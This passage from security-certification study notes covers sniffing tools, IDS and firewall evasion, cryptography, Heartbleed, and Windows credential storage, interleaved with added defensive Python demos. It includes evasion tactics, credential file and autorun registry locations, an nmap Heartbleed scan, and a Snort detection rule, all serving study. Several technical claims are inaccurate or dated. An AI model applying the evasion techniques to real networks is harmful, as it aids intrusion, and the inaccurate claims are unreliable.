125 | - **Rogue DHCP Server** - set up to offer addresses instead of the real server. Can be combined with starvation of the real server.
126 |
127 | ### Spoofing
128 |
129 | - **MAC Spoofing** - changes your MAC address. Benefit is CAM table uses most recent address.
130 | - Port security can slow this down, but doesn't always stop it
131 | - MAC Spoofing makes the switch send all packets to your address instead of the intended one until the CAM table is updated with the real address again
132 | - **IRDP Spoofing** - hacker sends ICMP Router Discovery Protocol messages advertising a malicious gateway
133 | - **DNS Poisoning** - changes where machines get their DNS info from, allowing attacker to redirect to malicious websites
134 |
135 | ### Sniffing Tools
136 |
137 | - **Wireshark**
138 | - Previously known as Ethereal
139 | - Can be used to follow streams of data
140 | - Can also filter the packets so you can find a specific type or specific source address
141 | - **Example filters**
142 | - ! (arp or icmp or dns) - filters out the "noise" from ARP, DNS and ICMP requests
143 | - http.request - displays HTTP GET requests
144 | - tcp contains string - displays TCP segments that contain the word "string"
145 | - ip.addr==172.17.15.12 && tcp.port==23 - displays telnet packets containing that IP
146 | - tcp.flags==0x16 - filters TCP requests with ACK flag set
147 | - **tcpdump**
148 | - Recent version is WinDump (for Windows)
149 | - **Syntax**
150 | - tcpdump flag(s) interface
151 | - tcpdump -i eth1 - puts the interface in listening mode
152 | - **tcptrace**
153 | - Analyzes files produced by packet capture programs such as Wireshark, tcpdump and Etherpeek
154 | - **Other Tools**
155 | - **Ettercap** - also can be used for MITM attacks, ARP poisoning. Has active and passive sniffing.
156 | - **Capsa Network Analyzer**
157 | - **Snort** - usually discussed as an Intrusion Detection application
158 | - **Sniff-O-Matic**
159 | - **EtherPeek**
160 | - **WinDump**
161 | - **WinSniffer**
162 |
163 | ### Devices To Evade
164 |
165 | - **Intrusion Detection System** (IDS) - hardware or software devices that examine streams of packets for malicious behavior
166 | - **Signature based** - compares packets against a list of known traffic patterns
167 | - **Anomaly based** - makes decisions on alerts based on learned behavior and "normal" patterns
168 | - **False negative** - case where traffic was malicious, but the IDS did not pick it up
169 | - **HIDS** (Host-based intrusion detection system) - IDS that is host-based
170 | - **NIDS** (Network-based intrusion detection system) - IDS that scans network traffic
171 | - **Snort** - a widely deployed IDS that is open source
172 | - Includes a sniffer, traffic logger and a protocol analyzer
173 | - Runs in three different modes
174 | - **Sniffer** - watches packets in real time
175 | - **Packet logger** - saves packets to disk for review at a later time
176 | - **NIDS** - analyzes network traffic against various rule sets
177 | - Configuration is in /etc/snort on Linux and c:\snort\etc in Windows
178 | - **Rule syntax**
179 | - alert tcp !$HOME_NET any -> $HOME_NET 31337 (msg:"BACKDOOR ATTEMPT-Backorifice";)
180 | - This alerts on TCP traffic that is not from the home network (i.e., from an external address) going to the internal network on port 31337
181 | - **Example output**
182 | - 10/19-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 type:0x800 len:0x5EA
183 | **xxx -> xxx TCP TTL:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF**
184 | - Important info is bolded
185 | - **Firewall**
186 | - An appliance within a network that protects internal resources from unauthorized access
187 | - Only uses rules that **implicitly deny** traffic unless it is allowed
188 | - Oftentimes uses **network address translation** (NAT) which can apply a one-to-one or one-to-many relationship between external and internal IP addresses
189 | - **Screened subnet** - hosts all public-facing servers and services
190 | - **Bastion hosts** - hosts on the screened subnet designed to protect internal resources
191 | - **Private zone** - hosts internal hosts that only respond to requests from within that zone
192 | - **Multi-homed** - firewall that has two or more interfaces
193 | - **Packet-filtering** - firewalls that only look at headers
194 | - **Stateful inspection** - firewalls that track the entire status of a connection
195 | - **Circuit-level gateway** - firewall that works on Layer 5 (Session layer)
196 | - **Application-level gateway** - firewall that works like a proxy, allowing specific services in and out
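
An added example (not from the study guide or the Snort project) showing how the rule header above is evaluated: it parses the action, protocol, source/destination address and port specs (including `!` negation and `$HOME_NET`), then runs the rule over constructed flows so that only the external-to-internal connection on port 31337 fires. The `VARS` table stands in for `snort.conf` variables and is an assumption.

```python
import ipaddress
import re

# The rule quoted in the guide, with the source variable written the way Snort
# expects it ($HOME_NET) and the options block terminated with ';'.
RULE = 'alert tcp !$HOME_NET any -> $HOME_NET 31337 (msg:"BACKDOOR ATTEMPT-Backorifice";)'

# Constructed variable table, standing in for `var HOME_NET ...` in snort.conf.
VARS = {"HOME_NET": ["192.168.1.0/24"]}

HEADER = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)

def parse_rule(rule):
    """Split a rule into its header fields and a dict of options (msg, sid, ...)."""
    m = HEADER.match(rule)
    if not m:
        raise ValueError("unparsable rule: %s" % rule)
    r = m.groupdict()
    opts = {}
    for opt in r.pop("opts").split(";"):
        if opt.strip():
            key, _, val = opt.partition(":")
            opts[key.strip()] = val.strip().strip('"')
    r["opts"] = opts
    return r

def addr_matches(spec, ip, variables):
    """Address spec: 'any', '$VAR' (a list of CIDRs), or a CIDR, optionally '!'-negated."""
    if spec == "any":
        return True
    negate = spec.startswith("!")
    spec = spec.lstrip("!")
    nets = variables[spec[1:]] if spec.startswith("$") else [spec]
    addr = ipaddress.ip_address(ip)
    hit = any(addr in ipaddress.ip_network(n, strict=False) for n in nets)
    return hit != negate

def port_matches(spec, port):
    """Port spec: 'any', a single port, or a Snort range 'lo:hi', optionally negated."""
    if spec == "any":
        return True
    negate = spec.startswith("!")
    spec = spec.lstrip("!")
    if ":" in spec:
        lo, _, hi = spec.partition(":")
        hit = int(lo or 0) <= port <= int(hi or 65535)
    else:
        hit = port == int(spec)
    return hit != negate

def rule_matches(r, pkt, variables):
    """Return the rule's msg if the packet header matches, else None."""
    if r["proto"] != "ip" and r["proto"] != pkt["proto"]:
        return None

    def one_way(src, sport, dst, dport):
        return (addr_matches(r["src"], src, variables) and port_matches(r["sport"], sport)
                and addr_matches(r["dst"], dst, variables) and port_matches(r["dport"], dport))

    hit = one_way(pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
    if not hit and r["dir"] == "<>":      # bidirectional rules match either direction
        hit = one_way(pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])
    return r["opts"].get("msg") if hit else None

def run_rules(rules, flows, variables):
    """Evaluate every rule against every flow; returns (flow index, action, msg) hits."""
    parsed = [parse_rule(x) for x in rules]
    return [(i, r["action"], msg)
            for i, f in enumerate(flows)
            for r in parsed
            if (msg := rule_matches(r, f, variables))]

# Constructed flows: only the first one should fire (external source, internal
# destination, port 31337, TCP). The others fail on source, port, or protocol.
FLOWS = [
    {"proto": "tcp", "src": "203.0.113.5", "sport": 40000, "dst": "192.168.1.10", "dport": 31337},
    {"proto": "tcp", "src": "192.168.1.20", "sport": 40000, "dst": "192.168.1.10", "dport": 31337},
    {"proto": "tcp", "src": "203.0.113.5", "sport": 40000, "dst": "192.168.1.10", "dport": 443},
    {"proto": "udp", "src": "203.0.113.5", "sport": 40000, "dst": "192.168.1.10", "dport": 31337},
]

if __name__ == "__main__":
    for hit in run_rules([RULE], FLOWS, VARS):
        print("flow %d -> %s: %s" % hit)
```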
197 |
198 | ### Evasion Techniques
199 |
200 | - **Slow down** - faster scanning such as using nmap's -T5 switch will get you caught. Pros use -T1 switch to get better results
201 | - **Flood the network** - trigger alerts that aren't your intended attack so that you confuse firewalls/IDS and network admins
202 | - **Fragmentation** - splits up packets so that the IDS can't detect the real intent
203 | - **Unicode encoding** - works with web requests - using Unicode characters instead of ASCII can sometimes get past
204 | - **Tools**
205 | - **Nessus** - also a vulnerability scanner
206 | - **ADMmutate** - creates scripts not recognizable by signature files
207 | - **NIDSbench** - older tool for fragmenting bits
208 | - **Inundator** - flooding tool
209 |
210 | ### Firewall Evasion
211 |
212 | - ICMP Type 3 Code 13 will show that traffic is being blocked by firewall
213 | - ICMP Type 3 Code 3 tells you the client itself has the port closed
214 | - Firewall type can be discerned by banner grabbing
215 | - **Firewalking** - going through every port on a firewall to determine what is open
216 | - **Tools**
217 | - CovertTCP
218 | - ICMP Shell
219 | - 007 Shell
220 | - The best way around a firewall will always be a compromised internal machine
221 |
222 | ### Honeypots
223 |
224 | - A system set up as a decoy to entice attackers
225 | - Should not include too many open services or look too easy to attack
226 | - **High interaction** - simulates all services and applications and is designed to be completely compromised
227 | - **Low interaction** - simulates a number of services and cannot be completely compromised
228 | - **Examples**
229 | - Specter
230 | - Honeyd
231 | - KFSensor
232 |
--------------------------------------------------------------------------------
/11 - Cryptography 101.md:
--------------------------------------------------------------------------------
1 | # Cryptography 101
2 |
3 | ### Cryptography Basics
4 |
5 | - **Cryptography** - science or study of protecting information whether in transit or at rest
6 | - Renders the information unusable to anyone who can't decrypt it
7 | - Takes plain text, applies a cryptographic method, and turns it into cipher text
8 | - **Cryptanalysis** - study and methods used to crack cipher text
9 | - **Linear Cryptanalysis** - works best on block ciphers
10 | - **Differential Cryptanalysis** - applies to symmetric key algorithms
11 | - Compares differences in the inputs to how each one affects the outcome
12 | - **Integral cryptanalysis** - input vs output comparison same as differential; however, runs multiple computations of the same block size input
13 | - Plain text doesn't necessarily mean ASCII format - it simply means unencrypted data
14 | - **Nonrepudiation** - means by which a recipient can ensure the identity of the sender and neither party can deny sending
15 |
16 | ### Encryption Algorithms and Techniques
17 |
18 | - **Algorithm** - step-by-step method of solving a problem
19 | - **Two General Forms of Cryptography**
20 | - **Substitution** - bits are replaced by other bits
21 | - **Transposition** - doesn't replace; simply changes order
22 | - **Encryption Algorithms** - mathematical formulas used to encrypt and decrypt data
23 | - **Stream Cipher** - readable bits are encrypted one at a time in a continuous stream
24 | - Usually done by an XOR operation
25 | - Work at a high rate of speed
26 | - **Block Cipher** - data bits are split up into blocks and fed into the cipher
27 | - Each block of data (usually 64 bits) encrypted with key and algorithm
28 | - Are simpler and slower than stream ciphers
29 | - **XOR** - exclusive or; if inputs are the same (0,0 or 1,1), function returns 0; if inputs are not the same (0,1 or 1,0), function returns 1
30 | - Key chosen for cipher must have a length larger than the data; if not, it is vulnerable to frequency attacks
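
An added example (not from the study guide) of the XOR stream cipher and the key-length rule above: a 5-byte key reused across the message leaves a period-5 statistical fingerprint that an index-of-coincidence check recovers, while a random key as long as the data (used once) leaves nothing to find. The plaintext, the key and the 0.045 threshold are constructed for the demonstration.

```python
import os
from collections import Counter

def xor_cipher(data, key):
    """XOR stream cipher: each data byte is XORed with the keystream byte at the
    same position. The key repeats if it is shorter than the data (the weak case)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def index_of_coincidence(buf):
    """Probability that two bytes drawn from buf are equal. English text scores
    roughly 0.07; uniformly random bytes score about 1/256."""
    n = len(buf)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(buf).values()) / (n * (n - 1))

def likely_key_length(ct, max_len=12, threshold=0.045):
    """Return the shortest period whose columns look like text under a single
    XOR byte (high IoC), or None if the ciphertext looks uniformly random.

    XOR with one constant byte only relabels symbols, so the frequency profile
    of each column survives; that is the 'frequency attack' the guide warns about."""
    for period in range(1, max_len + 1):
        cols = [ct[i::period] for i in range(period)]
        score = sum(index_of_coincidence(c) for c in cols) / period
        if score >= threshold:
            return period
    return None

# Constructed plaintext (not from the study guide), long enough for statistics.
PLAINTEXT = (b"Sniffing is capturing packets as they pass on the wire and reviewing them for "
             b"interesting information. A switch keeps a table of which address lives on "
             b"which port, a hub simply repeats every frame to every port. Protocols that "
             b"carry credentials in clear text, such as telnet, FTP and POP3, are the first "
             b"things a passive listener will harvest from the collision domain. ") * 2

SHORT_KEY = b"\x8b\x3a\xc7\x51\xe2"   # constructed 5-byte key, reused across the message

def demo():
    """Weak: short repeating key. Strong: key as long as the data, used once."""
    weak_ct = xor_cipher(PLAINTEXT, SHORT_KEY)
    otp_key = os.urandom(len(PLAINTEXT))
    strong_ct = xor_cipher(PLAINTEXT, otp_key)
    return likely_key_length(weak_ct), likely_key_length(strong_ct)

if __name__ == "__main__":
    weak, strong = demo()
    print("repeating 5-byte key -> detected period:", weak)
    print("one-time key          -> detected period:", strong)
```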
31 |
32 | ### Symmetric Encryption
33 |
34 | - **Symmetric Encryption** - known as single key or shared key
35 | - One key is used to encrypt and decrypt the data
36 | - Problems include key distribution and management
37 | - Suitable for large amounts of data
38 | - Harder for groups of people because more keys are needed as group increases
39 | - Does nothing for nonrepudiation; only performs confidentiality
40 | - **Algorithms**
41 | - **DES** - block cipher; 56 bit key; quickly outdated and now considered not very secure
42 | - **3DES** - block cipher; 168 bit key; more effective than DES but much slower
43 | - **AES** (Advanced Encryption Standard) - block cipher; 128, 192 or 256 bit key; replaces DES; much faster than DES and 3DES
44 | - **IDEA** (International Data Encryption Algorithm) - block cipher; 128 bit key; originally used in PGP 2.0
45 | - **Twofish** - block cipher; up to 256 bit key
46 | - **Blowfish** - fast block cipher; replaced by AES; 64 bit block size; 32 to 448 bit key; considered public domain
47 | - **RC** (Rivest Cipher) - RC2 to RC6; block cipher; comparable key length up to 2040 bits; RC6 (latest version) uses 128 bit blocks and 4 bit working registers; RC5 uses variable block sizes and 2 bit working registers. RC4 is a stream cipher
48 |
49 | ### Asymmetric Encryption
50 |
51 | - Uses two types of keys for encryption and decryption
52 | - **Public Key** - generally used for encryption; can be sent to anyone
53 | - **Private Key** - kept secret; used for decryption
54 | - Comes down to what one key encrypts, the other decrypts
55 | - The private key is used to digitally sign a message
56 | - **Algorithms**
57 | - **Diffie-Hellman** - developed as a key exchange protocol; used in SSL and IPSec; if digital signatures are waived, vulnerable to MITM attacks
58 | - **Elliptic Curve Cryptosystem** (ECC) - uses points on an elliptic curve along with logarithmic problems; uses less processing power; good for mobile devices
59 | - **El Gamal** - not based on prime number factoring; uses solving of discrete logarithm problems
60 | - **RSA** - achieves strong encryption through the use of two large prime numbers; factoring these creates key sizes up to 4096 bits; modern de facto standard
61 | - Only downside is it's slower than symmetric especially on bulk encryption and processing power
62 |
63 | ### Hash Algorithms
64 |
65 | - **Hash** - one-way mathematical function that produces a fixed-length string (hash) based on the arrangement of data bits in the input
66 | - **Algorithms**
67 | - **MD5** (Message Digest algorithm) - produces 128 bit hash expressed as 32 digit hexadecimal number; has serious flaws; still used for file download verification
68 | - **SHA-1** - developed by NSA; 160 bit value output
69 | - **SHA-2** - four separate hash functions; produce outputs of 224, 256, 384 and 512 bits; not widely used
70 | - **SHA-3** - uses sponge construction
71 | - **RIPEMD-#** - works through 80 stages, executing 5 blocks 16 times each; uses modulo 32 addition
72 | - **Collision** - occurs when two or more files create the same output
73 | - Can happen and can be used in an attack; rare, though
74 | - **DUHK Attack** (Don't Use Hard-Coded Keys) - allows attackers to access keys in certain VPN implementations; affects devices using ANSI X9.31 with a hard-coded seed key
75 | - **Rainbow Tables** - contain precomputed hashes to try and find out passwords
76 | - **Salt** - used with a hash to obscure the hash; collection of random bits
77 | - **Things to Remember**
78 | - Hashes are used for integrity
79 | - Hashes are one-way functions
80 | - **Tools**
81 | - HashCalc
82 | - MD5 Calculator
83 | - HashMyFiles
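
An added example (not from the study guide) of why a salt defeats precomputed tables: an unsalted SHA-256 of a common password is found instantly in a small constructed lookup table, while the same password hashed with a random salt and PBKDF2 produces a different value per user and is not in any table built in advance. The wordlist and the 100,000-iteration count are assumptions.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the inputs of a precomputed (rainbow) table.
WORDLIST = ["password", "letmein", "123456", "qwerty", "summer2019"]

def build_lookup_table(words):
    """Precomputed unsalted SHA-256 digests: hex digest -> password."""
    return {hashlib.sha256(w.encode()).hexdigest(): w for w in words}

def crack_unsalted(digest_hex, table):
    """A table lookup is all it takes when no salt was used."""
    return table.get(digest_hex)

def hash_password(password, salt=None, iterations=100_000):
    """Salted, iterated PBKDF2-HMAC-SHA256. Returns 'iterations$salt$digest'.

    The random salt makes every stored hash unique, so a table computed ahead of
    time cannot be reused; the iteration count slows down per-guess brute force."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

def demo():
    table = build_lookup_table(WORDLIST)
    leaked_unsalted = hashlib.sha256(b"letmein").hexdigest()
    table_hit = crack_unsalted(leaked_unsalted, table)          # "letmein": instant hit
    # Two users with the same password get different salted hashes.
    h1, h2 = hash_password("letmein"), hash_password("letmein")
    salted_hit = crack_unsalted(h1.split("$")[2], table)         # None: not in the table
    return (table_hit, h1 != h2, verify_password("letmein", h1),
            verify_password("wrong", h1), salted_hit)

if __name__ == "__main__":
    print(demo())
```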
84 |
85 | ### Steganography
86 |
87 | - **Steganography** - practice of concealing a message inside another medium so that only the sender and recipient know of its existence
88 | - **Ways to Identify**
89 | - Text - character positions are key - blank spaces, text patterns
90 | - Image - file larger in size; some may have color palette faults
91 | - Audio & Video - require statistical analysis
92 | - **Methods**
93 | - Least significant bit insertion - changes least meaningful bit
94 | - Masking and filtering (grayscale images) - like watermarking
95 | - Algorithmic transformation - hides in mathematical functions used in image compression
96 | - **Tools**
97 | - QuickStego
98 | - gifshuffle
99 | - SNOW
100 | - Steganography Studio
101 | - OpenStego
102 |
103 | ### PKI System
104 |
105 | - **Public Key Infrastructure** (PKI) - structure designed to verify and authenticate the identity of individuals
106 | - **Registration Authority** - verifies user identity
107 | - **Certificate Authority** - third party to the organization; creates and issues digital certificates
108 | - **Certificate Revocation List** (CRL) - used to track which certificates have problems and which have been revoked
109 | - **Validation Authority** - used to validate certificates via Online Certificate Status Protocol (OCSP)
110 | - **Trust Model** - how entities within an enterprise deal with keys, signatures and certificates
111 | - **Cross-Certification** - allows a CA to trust another CA in a completely different PKI; allows both CAs to validate certificates from either side
112 | - **Single-authority system** - CA at the top
113 | - **Hierarchical trust system** - CA at the top (root CA); makes use of one or more RAs (subordinate CAs) underneath it to issue and manage certificates
114 |
115 | ### Digital Certificates
116 |
117 | - **Certificate** - electronic file that is used to verify a user's identity; provides nonrepudiation
118 | - **X.509** - standard used for digital certificates
119 | - **Contents of a Digital Certificate**
120 | - **Version** - identifies certificate format
121 | - **Serial Number** - used to uniquely identify certificate
122 | - **Subject** - who or what is being identified
123 | - **Algorithm ID** (Signature Algorithm) - shows the algorithm that was used to create the certificate
124 | - **Issuer** - shows the entity that verifies authenticity
125 | - **Valid From and Valid To** - dates certificate is good for
126 | - **Key Usage** - what purpose the certificate serves
127 | - **Subject's Public Key** - copy of the subject's public key
128 | - **Optional Fields** - Issuer Unique Identifier, Subject Alternative Name, and Extensions
129 | - Some root CAs are automatically added to OSes that they already trust; normally are reputable companies
130 | - **Self-Signed Certificates** - certificates that are not signed by a CA; generally not used for public; used for development purposes
131 | - Signed by the same entity it certifies
132 |
133 | ### Digital Signatures
134 |
135 | - When signing a message, you sign it with your **private** key and the recipient decrypts the hash with your **public** key
136 | - **Digital Signature Algorithm** (DSA) - used in generation and verification of digital signatures per FIPS 186-2
137 |
138 | ### Full Disk Encryption
139 |
140 | - **Data at Rest** (DAR) - data that is in a stored state and not currently accessible
141 | - Usually protected by **full disk encryption** (FDE) with pre-boot authentication
142 | - Examples of FDE are Microsoft BitLocker and McAfee Endpoint Encryption
143 | - FDE also gives protection against boot-n-root
144 |
145 | ### Encrypted Communication
146 |
147 | - **Often-Used Encrypted Communication Methods**
148 | - **Secure Shell** (SSH) - secured version of telnet; uses port 22; relies on public key cryptography; SSH2 is successor and includes SFTP
149 | - **Secure Sockets Layer** (SSL) - encrypts data at transport layer and above; uses RSA encryption and digital certificates; has a six-step process; largely has been replaced by TLS
150 | - **Transport Layer Security** (TLS) - uses RSA 1024 and 2048 bits; successor to SSL; allows both client and server to authenticate to each other; TLS Record Protocol provides secured communication channel
151 | - **Internet Protocol Security** (IPSEC) - network layer tunneling protocol; used in tunnel and transport modes; ESP encrypts each packet
152 | - **PGP** - Pretty Good Privacy; used for signing, compressing and encrypting emails, files and directories; known as a hybrid cryptosystem - features conventional and public key cryptography
153 | - **S/MIME** - standard for public key encryption and signing of MIME data; only difference between this and PGP is PGP can encrypt files and drives unlike S/MIME
154 | - **Heartbleed** - attack on OpenSSL heartbeat which verifies data was received correctly
155 | - Vulnerability is that a heartbeat request carrying a single byte of data can get 64 KB back from the server
156 | - This data is random; could include usernames, passwords, private keys, cookies; very easy to pull off
157 | - nmap -d --script ssl-heartbleed --script-args vulns.showall -sV [host]
158 | - Vulnerable versions include OpenSSL 1.0.1 and 1.0.1f
159 | - CVE-2014-0160
160 | - **FREAK** (Factoring Attack on RSA-EXPORT Keys) - man-in-the-middle attack that forces a downgrade of RSA key to a weaker length
161 | - **POODLE** (Padding Oracle On Downgraded Legacy Encryption) - downgrade attack that used the vulnerability that TLS downgrades to SSL if a connection cannot be made
162 | - SSL 3 uses RC4, which is easy to crack
163 | - CVE-2014-3566
164 | - Also called PoodleBleed
165 | - **DROWN** (Decrypting RSA with Obsolete and Weakened eNcryption) - affects SSL and TLS services
166 | - Allows attackers to break the encryption and steal sensitive data
167 | - Uses flaws in SSL v2
168 | - Not only web servers; can be IMAP and POP servers as well
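
An added simulation (not from the study guide or OpenSSL) of the Heartbleed bounds bug described above: a heartbeat handler that trusts the request's own length field copies bytes from beyond the record, while the corrected handler checks the claimed length against the real record length and silently discards the request. The "memory" and the secret bytes behind the record are constructed.

```python
import struct

# Heartbeat message layout (RFC 6520): type(1) | payload_length(2) | payload | padding(16).
def build_memory(payload, claimed_len, secrets):
    """Return (record, memory): the record as received, and a simulated process
    buffer where unrelated secrets sit right behind it. Constructed data."""
    record = struct.pack("!BH", 1, claimed_len) + payload + b"\x00" * 16
    return record, record + secrets

def heartbeat_vulnerable(memory, record_len):
    """Trusts the peer-controlled length field and copies that many bytes back."""
    _hb_type, payload_len = struct.unpack("!BH", memory[:3])
    payload = memory[3:3 + payload_len]   # reads past the record when payload_len is a lie
    return struct.pack("!BH", 2, payload_len) + payload + b"\x00" * 16

def heartbeat_fixed(memory, record_len):
    """Checks the claimed length against the actual record length (the fix shipped
    in OpenSSL 1.0.1g); returns None for a request that must be discarded."""
    if record_len < 1 + 2 + 16:
        return None                        # too short to even hold the header and padding
    _hb_type, payload_len = struct.unpack("!BH", memory[:3])
    if 1 + 2 + payload_len + 16 > record_len:
        return None                        # claimed payload would overrun the record
    payload = memory[3:3 + payload_len]
    return struct.pack("!BH", 2, payload_len) + payload + b"\x00" * 16

def demo():
    """A 2-byte payload that claims to be 64 bytes long: the vulnerable handler
    echoes the secrets behind the record, the fixed one drops the request."""
    secrets = b"user=admin;pass=hunter2;"   # constructed, stands in for keys/cookies
    record, memory = build_memory(b"hi", claimed_len=64, secrets=secrets)
    leaky = heartbeat_vulnerable(memory, len(record))
    safe = heartbeat_fixed(memory, len(record))
    return secrets in leaky, safe

if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable handler leaked secrets:", leaked)
    print("fixed handler response:", safe)
```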
169 |
170 | ### Cryptography Attacks
171 |
172 | - **Known plain-text attack** - has both plain text and cipher-text; plain-text scanned for repeatable sequences which is compared to cipher text
173 | - **Chosen plain-text attack** - attacker encrypts multiple plain-text copies in order to gain the key
174 | - **Adaptive chosen plain-text attack** - attacker makes a series of interactive queries choosing subsequent plaintexts based on the information from the previous encryptions; idea is to glean more and more information about the full target cipher text and key
175 | - **Cipher-text-only attack** - attacker gains copies of several messages encrypted with the same algorithm; statistical analysis is then used to eventually reveal repeating patterns
176 | - **Replay attack**
177 | - Usually performed within context of MITM attack
178 | - Hacker repeats a portion of a cryptographic exchange in hopes of fooling the system into setting up a communications channel
179 | - Doesn't know the actual data - just has to get timing right
180 | - **Chosen Cipher Attack**
181 | - Chooses a particular cipher-text message
182 | - Attempts to discern the key through comparative analysis
183 | - RSA is particularly vulnerable to this
184 | - **Side-Channel Attack**
185 | - Monitors environmental factors such as power consumption, timing and delay
186 | - **Tools**
187 | - Carnivore and Magic Lantern - used by law enforcement for cracking codes
188 | - L0phtcrack - used mainly against Windows SAM files
189 | - John the Ripper - UNIX/Linux tool for the same purpose
190 | - PGPcrack - designed to go after PGP-encrypted systems
191 | - CrypTool
192 | - Cryptobench
193 | - Jipher
194 | - Keys should still change on a regular basis even though they may be "unhackable"
195 | - Per U.S. government, an algorithm using at least a 256-bit key cannot be cracked
196 |
--------------------------------------------------------------------------------
/5 - Attacking a System.md:
--------------------------------------------------------------------------------
1 | # Attacking a System
2 |
3 | ### Windows Security Architecture
4 |
5 | - Authentication credentials stored in SAM file
6 | - File is located at C:\windows\system32\config
7 | - Older systems use LM hashing. Current systems use NTLM v2 (MD5)
8 | - Windows network authentication uses Kerberos
9 | - **LM Hashing**
10 | - Splits the password up. If it's over 7 characters, it is encoded in two sections.
11 | - If one section is blank, the hash will be AAD3B435B51404EE
12 | - Easy to break if the password is 7 characters or under because the second half is the known blank hash and only the first half has to be cracked
13 | - SAM file presents as UserName:SID:LM_Hash:NTLM_Hash:::
14 | - **Ntds.dit** - database file on a domain controller that stores passwords
15 | - Located in %SystemRoot%\NTDS\Ntds.dit or
16 | - Located in %SystemRoot%\System32\Ntds.dit
17 | - Includes the entire Active Directory
18 | - **Kerberos**
19 | - Steps of exchange
20 | 1. Client asks **Key Distribution Center** (KDC) for a ticket. Sent in clear text.
21 | 2. Server responds with a **Ticket Granting Ticket** (TGT). This is encrypted with the copy of the user's password hash stored on the server.
22 | 3. If client can decrypt it, the TGT is sent back to the server requesting a **Ticket Granting Service** (TGS) service ticket.
23 | 4. Server sends TGS service ticket which client uses to access resources.
24 | - **Tools**
25 | - KerbSniff
26 | - KerbCrack
27 | - Both take a long time to crack
28 | - **Registry**
29 | - Collection of all settings and configurations that make the system run
30 | - Made up of keys and values
31 | - Root level keys
32 | - **HKEY_LOCAL_MACHINE** (HKLM) - information on hardware and software
33 | - **HKEY_CLASSES_ROOT** (HKCR) - information on file associations and OLE classes
34 | - **HKEY_CURRENT_USER** (HKCU) - profile information for the current user including preferences
35 | - **HKEY_USERS** (HKU) - specific user configuration information for all currently active users
36 | - **HKEY_CURRENT_CONFIG** (HKCC) - pointer to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current
37 | - Type of values
38 | - **REG_SZ** - character string
39 | - **REG_EXPAND_SZ** - expandable string value
40 | - **REG_BINARY** - a binary value
41 | - **REG_DWORD** - 32-bit unsigned integer
42 | - **REG_LINK** - symbolic link to another key
43 | - Important Locations
44 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
45 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
46 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
47 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
48 | - Executables to edit
49 | - regedit.exe
50 | - regedt32.exe (preferred by Microsoft)
51 | - **MMC**
52 | - Microsoft Management Console - used by Windows to administer system
53 | - Has "snap-ins" that allow you to modify sets (such as Group Policy Editor)
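An added Python example (not from the study guide or the book it summarizes) of auditing dump lines in the UserName:SID:LM_Hash:NTLM_Hash::: layout described above: it shows how LM splits a password into two 7-byte halves, and flags accounts whose second LM half is the blank constant AAD3B435B51404EE. The hex values in the test data are constructed placeholders except for the two well-known blank-password constants.

```python
from typing import Dict, List, Tuple

EMPTY_LM_HALF = "AAD3B435B51404EE"               # DES of the LM magic with an all-null 7-byte half
EMPTY_LM = EMPTY_LM_HALF * 2                     # LM hash of a blank password (or LM storage disabled)
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"    # NT hash of a blank password


def lm_halves(password: str) -> Tuple[bytes, bytes]:
    """Show how LM prepares a password: uppercase, pad/truncate to 14 bytes, split into two 7-byte halves."""
    prepared = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\x00")
    return prepared[:7], prepared[7:]


def second_half_blank(password: str) -> bool:
    """True when the password is 7 characters or shorter, so the second LM half is all nulls."""
    return lm_halves(password)[1] == b"\x00" * 7


def parse_line(line: str) -> Dict[str, str]:
    """Split one UserName:RID:LM_Hash:NTLM_Hash::: line into its fields."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": rid, "lm": lm.upper(), "nt": nt.upper()}


def findings(entry: Dict[str, str]) -> List[str]:
    """Describe what the stored hashes give away about the account."""
    out: List[str] = []
    lm, nt = entry["lm"], entry["nt"]
    if nt == EMPTY_NT:
        out.append("blank password")
    if lm == EMPTY_LM:
        if nt != EMPTY_NT:
            out.append("LM hash not stored (LM disabled); NT hash only")
    elif lm[16:] == EMPTY_LM_HALF:
        out.append("LM hash stored and password is 7 characters or shorter: "
                   "second half is the blank constant, only the first half needs cracking")
    else:
        out.append("LM hash stored for an 8-14 character password: "
                   "crackable as two independent 7-character halves")
    return out


def audit(dump: str) -> Dict[str, List[str]]:
    """Run findings() over every non-empty line of a dump."""
    entries = (parse_line(line) for line in dump.splitlines() if line.strip())
    return {e["user"]: findings(e) for e in entries}
```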
54 |
55 | ### Linux Security Architecture
56 |
57 | - Linux root is just a slash (/)
58 | - Important locations
59 | - **/** - root directory
60 | - **/bin** - basic Linux commands
61 | - **/dev** - contains pointer locations to various storage and input/output systems
62 | - **/etc** - all administration files and passwords. Both password and shadow files are here
63 | - **/home** - holds the user home directories
64 | - **/mnt** - holds the access locations you've mounted
65 | - **/sbin** - system binaries folder which holds more administrative commands
66 | - **/usr** - holds almost all of the information, commands and files unique to the users
67 | - Linux Commands
68 |
69 | | Command | Description |
